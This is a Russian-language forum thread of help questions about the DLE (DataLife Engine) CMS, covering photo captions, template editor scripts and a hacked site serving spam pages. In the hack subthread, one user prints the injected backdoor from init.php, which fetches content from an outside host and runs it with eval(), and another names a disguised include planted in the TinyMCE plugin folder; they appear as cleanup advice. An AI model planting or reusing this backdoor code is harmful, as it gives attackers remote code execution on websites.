Помощь Вопросы по DLE (ВНИМАТЕЛЬНО читаем первый пост!!!)

[Горбушка]

Для просмотра ссылки Войди или Зарегистрируйся | Для просмотра ссылки Войди или Зарегистрируйся | Для просмотра ссылки Войди или Зарегистрируйся | Для просмотра ссылки Войди или Зарегистрируйся | Для просмотра ссылки Войди или Зарегистрируйся

Если у Вас недостаточно постов/уровня для создания новой темы, пишите свои вопросы здесь.

Если постов хватает - в новую тему.​

СПАСИБО!!!

Спасибо на этом форуме говорят кнопкой "Мне нравится"...

 

[User221]

Сайт на DLE 10.1, На сайте использован скрипт фотогалереи Для просмотра ссылки Войди или Зарегистрируйся - как в ней сделать подписи к фото подскажите плз - вот так не работает [img|подпись к фото]

А подпись нужна на фотке или просто нужен атрибут alt?

Вот может подойдет Для просмотра ссылки Войди или Зарегистрируйся
Вместо текста на примере вставь теги самого дле {title} ну или же доп поля

 

[akksimo]

А подпись нужна на фотке или просто нужен атрибут alt?

Вот может подойдет Для просмотра ссылки Войди или Зарегистрируйся
Вместо текста на примере вставь теги самого дле {title} ну или же доп поля

Чтобы указыннй мной скрипт Для просмотра ссылки Войди или Зарегистрируйся - работал в новости картинки располагаются в текстовом порядке:

[list]
[*][img]img_1.jpg[/img]
[*][img]img_2.jpg[/img]
[*][img]img_3.jpg[/img]
[/list]

Куда прописывать название, по вашему варианту

 

[User221]

Чтобы указыннй мной скрипт Для просмотра ссылки Войди или Зарегистрируйся - работал в новости картинки располагаются в текстовом порядке:

Куда прописывать название, по вашему варианту

Сейчас на сайте этот скрипт выводит картинки в новости? Или же он идет как отдельная галерея?


Просто если обычными функциями дле грузите фотки и добавляете их на сайт, то при загрузке фото в самом дле есть возможность указать описание. Просто после загрузке нажмите на саму фотки и там откроется поле где можно вписать описание

 

[Sherzod]

Вопрос по поводу взлома DLE. Сам ломать не пробовал, но взломали меня. Недавно в гугле появилось сообщение, что сайт взломан. При переходе на ссылки из отчетов гугла появляется какая-то левая страница на моем сайте, вид страницы типа форума с предложением скачать какие-то карты. Никто не сталкивался с таким и как это решить?

 

[Valeras]

Вопрос по поводу взлома DLE. Сам ломать не пробовал, но взломали меня. Недавно в гугле появилось сообщение, что сайт взломан. При переходе на ссылки из отчетов гугла появляется какая-то левая страница на моем сайте, вид страницы типа форума с предложением скачать какие-то карты. Никто не сталкивался с таким и как это решить?

Вы мне напомнили анекдот:
Мамаша с сыном подростком на приеме у врача.
-Доктор, у моего мальчика болит пися.
-Давайте посмотрим на писю, так, ага, все ясно. С этого момента "писю" называем мужским половым членом и начинаем лечить триппер.

DLE как и другая популярная ЦМС имеет уязвимости, в силу общедоступности исходного кода. О чем разработчики оповещают не таясь:
Для просмотра ссылки Войди или Зарегистрируйся
Но раз случилось тогда нужно лечиться. Но прежде чем лечиться нужно поменять пароли, явки доступа на хостинг, на длинный, не менее 12 символов с большими и малыми буковками и циферками не осмысленный, трудный для подбора (У хостеров, иногда есть возможность-сервис генерации пароля). С чем это связано - да с вирусами-троянами, черт их подери, отсюда советую проверить на вирусы ваш компьютер. Да еще использование открытого протокола FTP, с сохранением паролей в каком-нибудь виндоус коммандире, что облегчает доступ для вирусов-троянов по добыче ценной информации о "кодах доступа Зеона".
Далее вы проверяете index.php скорее всего он подменен или видоизменен. Если есть доступ в админку, проверяете антивирусником на предмет посторонних файлов на сервере. Скорее всего где-то стоит шеллка (файл с исполняемым кодом злоумышленника), при помощи которого, злоумышленник может да практически все - добавить любой файл на сервер, грохнуть базу данных и т.д.
Ели база данных не грохнута, то лучше всего удалить все, а потом поставить дистрибутив или бекап (сохранённые локально файлы с сервера).
Если восстановились из дистрибутива, то нужно подкорректировать конфиги (/engine/data/config.php и /engine/data/dbconfig.php).

Спасибо за напоминание, лишний раз сделал бекап своих сайтов.

 

[Tibald]

Вопрос по поводу взлома DLE. Сам ломать не пробовал, но взломали меня. Недавно в гугле появилось сообщение, что сайт взломан. При переходе на ссылки из отчетов гугла появляется какая-то левая страница на моем сайте, вид страницы типа форума с предложением скачать какие-то карты. Никто не сталкивался с таким и как это решить?

Недавно прошла по моим сайтам тоже волна с такими симптомами. Все ДЛЕ были лицухи разных версию, включая последнюю, но в пределах 1 хоста, так что скорее всего уязвимость у хостера.
Выглядит эта подлива вот так:

Спойлер: Картинка

Ссылки у тебя, скорее всего такого вида: твой.сайт/?for_um=2132

Лечить надо так:
Идешь в /engine/init.php
Открываешь его и там ищешь "-globals"
Ну и там уже по коду удаляешь условия, которые вызывают это.
У меня это были вот такие вставки в код:

Спойлер: Пример кода

if(isset($_GET***91;'for'.'_um'***93;)){
    $p = (int)$_GET***91;'for'.'_um'***93;;
    header('Content-Type: text/html; charset=windows-1251');
    echo eval('?>' . join("",file("http://gost"."-globals".".com/25."."04/62/$p.html")). '<?');
    die;
}
if(isset($_GET***91;'m'***93;)) {
    $m = (int)$_GET***91;'m'***93;;
    if($m==0)$m="";
    header('Content-Type: text/html; charset=windows-1251');
    echo eval('?>' . join("",file("http://gost"."-globals".".com/25."."04/62/map$m.html")). '<?');
    die;
} if(isset($_GET***91;'for'.'um1'***93;)) {
    header('Content-Type: text/html; charset=windows-1251');
    echo eval('?>' . join("",file("http://gost"."-globals".".com/25."."04/62/index1.html")). '<?');
    die();
} echo '';

Если никаких изменений в init.php не делал, то просто его перезалей.
Ну и если тебе модификация попалась, и это не помогло, то скачай себе всю папку engine и поиском в файлах пробей кусок урла, куда редиректит (у меня это был -globals)

 

[Sherzod]

Если никаких изменений в init.php не делал, то просто его перезалей.
Ну и если тебе модификация попалась, и это не помогло, то скачай себе всю папку engine и поиском в файлах пробей кусок урла, куда редиректит (у меня это был -globals)

Спасибо за подсказку, в общем нашел где все это зарылось. Файл init.php 51 строка вот такой инклуд:
include '/var/www/****/data/www/****/engine/editor/jscripts/tiny_mce/plugins/advimage/js/jquery/jquery.php';
Мне больше кажется что взламывали не хост, а есть дыра в тини_мсе, потому что ранее был еще один взлом, тогда мне хостеры скидывали статью, где говорилось о массовом взломе сайтов не только ДЛЕ, но и вордпресс, жумла и т.д. которые имели редактор тини_мсе.

 

[533312]

писал на официальном форуме DLE но пока никто не помог с решением

Прошу помочь, уже длительное время приходится редактировать шаблоны через FTP так как через админку разделы шаблонов не раскрываются (спойлер или как называется, вот такой вот код:

javascript:ShowOrHide('full-story1','full-story2')

чистая установка без модов, пробовал на версиях 7.5 и 8.3
может отключена какая-то функция на хостинге?

 

[killoff]

чистая установка без модов, пробовал на версиях 7.5 и 8.3
может отключена какая-то функция на хостинге?

Если установка чистая без модов и хаков - без проблем обновляй на 10.2 и смотри как будет работать, если нет - пиши!!!
А вообще - у тебя проблема с JS, либо они не подключаются, либо где-то конфликтуют, либо вообще их нет...

 

[Горбушка]

писал на официальном форуме DLE но пока никто не помог с решением


Прошу помочь, уже длительное время приходится редактировать шаблоны через FTP так как через админку разделы шаблонов не раскрываются (спойлер или как называется, вот такой вот код:

javascript:ShowOrHide('full-story1','full-story2')

чистая установка без модов, пробовал на версиях 7.5 и 8.3
может отключена какая-то функция на хостинге?

Что говорит консоль браузера? Что говорит отчёт Network в браузере? Есть ли 3хх, 4хх, 5хх ответы сервера?